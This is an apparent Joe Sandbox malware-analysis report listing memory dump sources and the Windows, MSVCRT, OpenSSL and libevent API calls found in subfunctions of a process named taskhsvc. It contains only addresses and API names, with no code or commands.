    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0033CC1C: RAND_poll.LIBEAY32 ref: 0033CC3A
      • Part of subcall function 0033CC1C: RAND_seed.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CC9E
      • Part of subcall function 0033CC1C: RAND_status.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CCCA
      • Part of subcall function 0033CC1C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CCEB
    • __stack_chk_fail.LIBSSP-0 ref: 001C4C9B
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001E3E77: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F0DE8), ref: 001E3EB7
      • Part of subcall function 0021329C: abort.MSVCRT ref: 00213305
      • Part of subcall function 0021329C: __stack_chk_fail.LIBSSP-0 ref: 0021359C
      • Part of subcall function 001E471C: abort.MSVCRT ref: 001E4857
      • Part of subcall function 001E471C: __stack_chk_fail.LIBSSP-0 ref: 001E4887
      • Part of subcall function 00342356: abort.MSVCRT ref: 003423A6
      • Part of subcall function 00342356: SSL_pending.SSLEAY32 ref: 003423B4
      • Part of subcall function 00342356: __stack_chk_fail.LIBSSP-0 ref: 003423C4
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 003423F9: SSL_get_rbio.SSLEAY32 ref: 00342425
      • Part of subcall function 003423F9: BIO_number_read.LIBEAY32 ref: 0034242D
      • Part of subcall function 003423F9: SSL_get_wbio.SSLEAY32 ref: 0034243E
      • Part of subcall function 003423F9: BIO_f_buffer.LIBEAY32 ref: 0034244B
      • Part of subcall function 003423F9: BIO_next.LIBEAY32 ref: 0034245A
      • Part of subcall function 003423F9: BIO_number_written.LIBEAY32 ref: 00342474
      • Part of subcall function 003423F9: __stack_chk_fail.LIBSSP-0 ref: 00342538
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 0031985E: __stack_chk_fail.LIBSSP-0 ref: 00319A18
    • abort.MSVCRT ref: 001F12C4
      • Part of subcall function 00206E23: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001C3569), ref: 00206E4C
      • Part of subcall function 00206E53: abort.MSVCRT(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EA5
      • Part of subcall function 00206E53: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EB6
      • Part of subcall function 001E3DED: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1825), ref: 001E3E14
      • Part of subcall function 001E4527: abort.MSVCRT ref: 001E459D
      • Part of subcall function 001E4527: abort.MSVCRT ref: 001E45E0
      • Part of subcall function 001E4527: abort.MSVCRT ref: 001E46E5
      • Part of subcall function 001E4527: __stack_chk_fail.LIBSSP-0 ref: 001E4715
      • Part of subcall function 001E8A34: abort.MSVCRT ref: 001E8A8A
      • Part of subcall function 001E8A34: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F13F9), ref: 001E8A9D
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 001E8860: abort.MSVCRT ref: 001E88CA
      • Part of subcall function 001E8860: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001E9EDC), ref: 001E88DD
      • Part of subcall function 0027DCF8: abort.MSVCRT ref: 0027DD82
      • Part of subcall function 0027DCF8: __stack_chk_fail.LIBSSP-0 ref: 0027DD95
      • Part of subcall function 001E557C: abort.MSVCRT ref: 001E562E
      • Part of subcall function 001E557C: __stack_chk_fail.LIBSSP-0 ref: 001E56D1
      • Part of subcall function 001E8780: abort.MSVCRT ref: 001E87D6
      • Part of subcall function 001E8780: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA4BB), ref: 001E87E9
      • Part of subcall function 00325435: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001F0905), ref: 00325455
      • Part of subcall function 001EF888: __stack_chk_fail.LIBSSP-0 ref: 001EFBD5
      • Part of subcall function 001EFBE0: abort.MSVCRT ref: 001EFCC0
      • Part of subcall function 001EFBE0: __stack_chk_fail.LIBSSP-0 ref: 001EFD44
    • __stack_chk_fail.LIBSSP-0 ref: 001F1529
      • Part of subcall function 001C274C: abort.MSVCRT ref: 001C279C
      • Part of subcall function 001C274C: event_pending.LIBEVENT-2-0-5 ref: 001C27D2
      • Part of subcall function 001C274C: __stack_chk_fail.LIBSSP-0 ref: 001C27F2
      • Part of subcall function 001EFD4B: abort.MSVCRT ref: 001EFE2B
      • Part of subcall function 001EFD4B: __stack_chk_fail.LIBSSP-0 ref: 001EFEAF
      • Part of subcall function 001EF26C: __stack_chk_fail.LIBSSP-0 ref: 001EF37D
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 003F6A10: fwrite.MSVCRT ref: 003F6A3B
      • Part of subcall function 003F6A10: vfprintf.MSVCRT ref: 003F6A57
      • Part of subcall function 003F6A10: abort.MSVCRT ref: 003F6A5C
      • Part of subcall function 003F6A70: VirtualQuery.KERNEL32 ref: 003F6B00
      • Part of subcall function 003F6A70: VirtualProtect.KERNELBASE ref: 003F6B42
      • Part of subcall function 003F6A70: GetLastError.KERNEL32 ref: 003F6B64
    • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 003F6D3B
    • VirtualProtect.KERNELBASE ref: 003F6D6C
    Memory Dump Source
    • Source File: 00000013.00000002.1855588250.003F6000.00000080.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002C032C: __stack_chk_fail.LIBSSP-0 ref: 002C042E
      • Part of subcall function 00315B2B: CreateFileA.KERNEL32 ref: 00315BEF
      • Part of subcall function 00315B2B: free.MSVCRT ref: 00315E9E
      • Part of subcall function 00315B2B: __stack_chk_fail.LIBSSP-0 ref: 00315F2B
      • Part of subcall function 00326B1B: abort.MSVCRT ref: 00326B85
      • Part of subcall function 00326B1B: strerror.MSVCRT ref: 00326BFE
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326C73
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326CDE
      • Part of subcall function 00326B1B: strerror.MSVCRT ref: 00326D57
      • Part of subcall function 00326B1B: free.MSVCRT ref: 00326D9F
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326DB1
      • Part of subcall function 00326B1B: strchr.MSVCRT ref: 00326DED
      • Part of subcall function 00326B1B: strlen.MSVCRT ref: 00326E4C
      • Part of subcall function 00326B1B: free.MSVCRT ref: 00326EEB
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326EFD
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326F1D
      • Part of subcall function 00326B1B: memcpy.MSVCRT ref: 00326F3D
      • Part of subcall function 00326B1B: __stack_chk_fail.LIBSSP-0 ref: 00326F50
    • __stack_chk_fail.LIBSSP-0 ref: 002C05F7
      • Part of subcall function 002BFAA4: free.MSVCRT ref: 002BFC97
      • Part of subcall function 002BFAA4: free.MSVCRT ref: 002BFE2B
      • Part of subcall function 002BFAA4: free.MSVCRT ref: 002BFF60
      • Part of subcall function 002BFAA4: __stack_chk_fail.LIBSSP-0 ref: 002BFFCF
    • free.MSVCRT ref: 002C059D
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 002C0B63: abort.MSVCRT ref: 002C0D46
      • Part of subcall function 002C0B63: free.MSVCRT ref: 002C0E12
      • Part of subcall function 002C0B63: strerror.MSVCRT ref: 002C0ED3
      • Part of subcall function 002C0B63: abort.MSVCRT ref: 002C1041
      • Part of subcall function 002C0B63: memcmp.MSVCRT ref: 002C108C
      • Part of subcall function 002C0B63: abort.MSVCRT ref: 002C1101
      • Part of subcall function 002C0B63: free.MSVCRT ref: 002C1181
      • Part of subcall function 002C0B63: memcmp.MSVCRT ref: 002C11A6
      • Part of subcall function 002C0B63: abort.MSVCRT ref: 002C11E3
      • Part of subcall function 002C0B63: __stack_chk_fail.LIBSSP-0 ref: 002C129E
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0032FC04: exit.MSVCRT ref: 0032FC72
      • Part of subcall function 0032FC04: __stack_chk_fail.LIBSSP-0 ref: 0032FD09
      • Part of subcall function 00318F30: abort.MSVCRT ref: 00318F86
      • Part of subcall function 00318F30: localtime.MSVCRT ref: 00318F91
      • Part of subcall function 00318F30: memcpy.MSVCRT ref: 00318FB4
      • Part of subcall function 00318F30: __stack_chk_fail.LIBSSP-0 ref: 00318FE5
    • strftime.MSVCRT ref: 00312608
      • Part of subcall function 0031237C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0031261B), ref: 003123F5
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
    • __stack_chk_fail.LIBSSP-0 ref: 0031266E
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 001E56D1
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 001E562E
      • Part of subcall function 001E52AC: abort.MSVCRT ref: 001E533A
      • Part of subcall function 001E52AC: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001C33C1), ref: 001E5350
      • Part of subcall function 001E5005: memcpy.MSVCRT ref: 001E50B2
      • Part of subcall function 001E5005: abort.MSVCRT ref: 001E5136
      • Part of subcall function 001E5005: __stack_chk_fail.LIBSSP-0 ref: 001E514C
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 001E8780: abort.MSVCRT ref: 001E87D6
      • Part of subcall function 001E8780: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA4BB), ref: 001E87E9
    • abort.MSVCRT ref: 001F232D
      • Part of subcall function 001E5005: memcpy.MSVCRT ref: 001E50B2
      • Part of subcall function 001E5005: abort.MSVCRT ref: 001E5136
      • Part of subcall function 001E5005: __stack_chk_fail.LIBSSP-0 ref: 001E514C
    • __stack_chk_fail.LIBSSP-0 ref: 001F2527
      • Part of subcall function 00206E53: abort.MSVCRT(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EA5
      • Part of subcall function 00206E53: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EB6
      • Part of subcall function 00206E23: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001C3569), ref: 00206E4C
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001E8860: abort.MSVCRT ref: 001E88CA
      • Part of subcall function 001E8860: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001E9EDC), ref: 001E88DD
      • Part of subcall function 0027DCF8: abort.MSVCRT ref: 0027DD82
      • Part of subcall function 0027DCF8: __stack_chk_fail.LIBSSP-0 ref: 0027DD95
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • time.MSVCRT ref: 00237E82
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 002C1E90: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00238007), ref: 002C1EC8
      • Part of subcall function 002B3FD0: __stack_chk_fail.LIBSSP-0 ref: 002B4030
      • Part of subcall function 00237F52: __stack_chk_fail.LIBSSP-0 ref: 00237FD2
    • __stack_chk_fail.LIBSSP-0 ref: 00237F4B
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0031721B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00316FE0), ref: 0031724B
    • socket.WS2_32 ref: 0031701F
    • __stack_chk_fail.LIBSSP-0 ref: 00317080
      • Part of subcall function 003172A4: ioctlsocket.WS2_32 ref: 003172DB
      • Part of subcall function 003172A4: __stack_chk_fail.LIBSSP-0 ref: 003172F0
      • Part of subcall function 00316D57: __stack_chk_fail.LIBSSP-0 ref: 00316DE2
      • Part of subcall function 00316CDC: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00316E12), ref: 00316D20
      • Part of subcall function 00316D27: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00316E8C), ref: 00316D50
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • FormatMessageA.KERNELBASE ref: 003192E4
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
    • __stack_chk_fail.LIBSSP-0 ref: 0031933D
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • _open.MSVCRT ref: 00315A44
    • __stack_chk_fail.LIBSSP-0 ref: 00315A5A
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00321197: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00321389), ref: 003211EF
    • abort.MSVCRT ref: 0032125C
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00319B54), ref: 0032127B
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • time.MSVCRT ref: 001CDAE9
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CDBD6), ref: 001CDB17
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • memset.MSVCRT ref: 0032117D
    • __stack_chk_fail.LIBSSP-0 ref: 00321190
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0033434A: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DEE90), ref: 003343B0
      • Part of subcall function 0033434A: memcpy.MSVCRT ref: 00334405
      • Part of subcall function 0033434A: __stack_chk_fail.LIBSSP-0 ref: 00334423
    • __stack_chk_fail.LIBSSP-0 ref: 002DE499
      • Part of subcall function 00322664: abort.MSVCRT ref: 003226B4
      • Part of subcall function 00322664: __stack_chk_fail.LIBSSP-0 ref: 00322709
      • Part of subcall function 00334293: memcpy.MSVCRT ref: 003342DE
      • Part of subcall function 00334293: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00334338), ref: 003342F1
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 002B2C58
      • Part of subcall function 0031F06F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CAF47), ref: 0031F0A7
      • Part of subcall function 0031F194: abort.MSVCRT ref: 0031F1F0
      • Part of subcall function 0031F194: abort.MSVCRT ref: 0031F22F
      • Part of subcall function 0031F194: abort.MSVCRT ref: 0031F26E
      • Part of subcall function 0031F194: abort.MSVCRT ref: 0031F319
      • Part of subcall function 0031F194: __stack_chk_fail.LIBSSP-0 ref: 0031F3A5
      • Part of subcall function 0031F0AE: abort.MSVCRT ref: 0031F104
      • Part of subcall function 0031F0AE: abort.MSVCRT ref: 0031F143
      • Part of subcall function 0031F0AE: __stack_chk_fail.LIBSSP-0 ref: 0031F18D
      • Part of subcall function 002B3EC7: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002B66C7), ref: 002B3EFF
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002BF2B8: memset.MSVCRT ref: 002BF3B3
      • Part of subcall function 002BF2B8: memset.MSVCRT ref: 002BF4BA
      • Part of subcall function 002BF2B8: __stack_chk_fail.LIBSSP-0(?), ref: 002BF590
      • Part of subcall function 002BEC89: __stack_chk_fail.LIBSSP-0 ref: 002BECC0
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,002C01E2), ref: 002BEF25
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002C1E90: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00238007), ref: 002C1EC8
      • Part of subcall function 002B4093: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0026B89E), ref: 002B40C7
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002B3295), ref: 002B362A
      • Part of subcall function 002B40CE: abort.MSVCRT ref: 002B412D
      • Part of subcall function 002B40CE: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,00000000,?,0026B8C3), ref: 002B416C
      • Part of subcall function 002B3023: abort.MSVCRT ref: 002B308D
      • Part of subcall function 002B3023: time.MSVCRT ref: 002B30F0
      • Part of subcall function 002B3023: __stack_chk_fail.LIBSSP-0 ref: 002B3141
      • Part of subcall function 002B33E8: abort.MSVCRT ref: 002B348F
      • Part of subcall function 002B33E8: __stack_chk_fail.LIBSSP-0 ref: 002B3545
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001E8780: abort.MSVCRT ref: 001E87D6
      • Part of subcall function 001E8780: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA4BB), ref: 001E87E9
      • Part of subcall function 001C27F9: abort.MSVCRT ref: 001C2849
      • Part of subcall function 001C27F9: event_del.LIBEVENT-2-0-5 ref: 001C28A9
      • Part of subcall function 001C27F9: __stack_chk_fail.LIBSSP-0 ref: 001C290A
      • Part of subcall function 0021329C: abort.MSVCRT ref: 00213305
      • Part of subcall function 0021329C: __stack_chk_fail.LIBSSP-0 ref: 0021359C
      • Part of subcall function 00212830: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001F2084), ref: 0021288C
      • Part of subcall function 00212830: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,001F2084), ref: 00212932
      • Part of subcall function 001EA631: __stack_chk_fail.LIBSSP-0 ref: 001EA800
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EA9F9
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EAA3B
      • Part of subcall function 001EA98A: abort.MSVCRT ref: 001EAA7A
      • Part of subcall function 001EA98A: time.MSVCRT ref: 001EABA2
      • Part of subcall function 001EA98A: __stack_chk_fail.LIBSSP-0 ref: 001EABBD
    • __stack_chk_fail.LIBSSP-0 ref: 001F2115
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002B3F06: abort.MSVCRT ref: 002B3F62
      • Part of subcall function 002B3F06: __stack_chk_fail.LIBSSP-0 ref: 002B3F72
      • Part of subcall function 0023368C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,00234A6D,?,?,?,?,?,00236C3A), ref: 002336E8
      • Part of subcall function 002B2C5F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00233A48), ref: 002B2C98
      • Part of subcall function 002336F3: __stack_chk_fail.LIBSSP-0 ref: 00233769
    • __stack_chk_fail.LIBSSP-0 ref: 00233AAE
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0024DAFE: abort.MSVCRT ref: 0024DB99
      • Part of subcall function 0024DAFE: memcpy.MSVCRT ref: 0024DD2D
      • Part of subcall function 0024DAFE: memcpy.MSVCRT ref: 0024DD5A
      • Part of subcall function 0024DAFE: memcpy.MSVCRT ref: 0024DDF6
      • Part of subcall function 0024DAFE: __stack_chk_fail.LIBSSP-0 ref: 0024DE68
    • __stack_chk_fail.LIBSSP-0 ref: 0024E0EB
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 003265E9: strerror.MSVCRT ref: 003266A8
      • Part of subcall function 003265E9: abort.MSVCRT ref: 00326730
      • Part of subcall function 003265E9: __stack_chk_fail.LIBSSP-0 ref: 00326762
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
    • __stack_chk_fail.LIBSSP-0 ref: 0032685E
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 001E5B8F: atoi.MSVCRT ref: 001E5DE7
      • Part of subcall function 001E5B8F: abort.MSVCRT ref: 001E5F86
      • Part of subcall function 001E5B8F: __stack_chk_fail.LIBSSP-0 ref: 001E5FE0
    • __stack_chk_fail.LIBSSP-0 ref: 001F1652
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 0024E175
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 00237466: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,002C0313), ref: 00237491
    Memory Dump Source
    • Source File: 00000013.00000002.1855104216.00230000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00312E50: abort.MSVCRT ref: 00312F7F
      • Part of subcall function 00312E50: abort.MSVCRT ref: 003131E3
      • Part of subcall function 00312E50: __stack_chk_fail.LIBSSP-0 ref: 00313200
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00319C41: abort.MSVCRT ref: 00319C9A
      • Part of subcall function 00319C41: memset.MSVCRT ref: 00319D32
      • Part of subcall function 00319C41: __stack_chk_fail.LIBSSP-0 ref: 00319D4C
    • __stack_chk_fail.LIBSSP-0 ref: 00319DB3
    Memory Dump Source
